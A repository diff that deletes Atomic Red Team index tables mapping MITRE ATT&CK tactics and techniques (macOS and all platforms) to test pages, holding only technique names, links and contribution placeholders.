| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
atomics/Indexes/Matrices/macos-matrix.md
-67
View File
@@ -1,67 +0,0 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [RC Scripts](../../T1037.004/T1037.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Plist Modification](../../T1547.011/T1547.011.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Trap](../../T1546.005/T1546.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Startup Items](../../T1037.005/T1037.005.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Rename System Utilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | | | [Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | [Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
atomics/Indexes/Matrices/matrix.md
-161
View File
@@ -1,161 +0,0 @@
# All Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
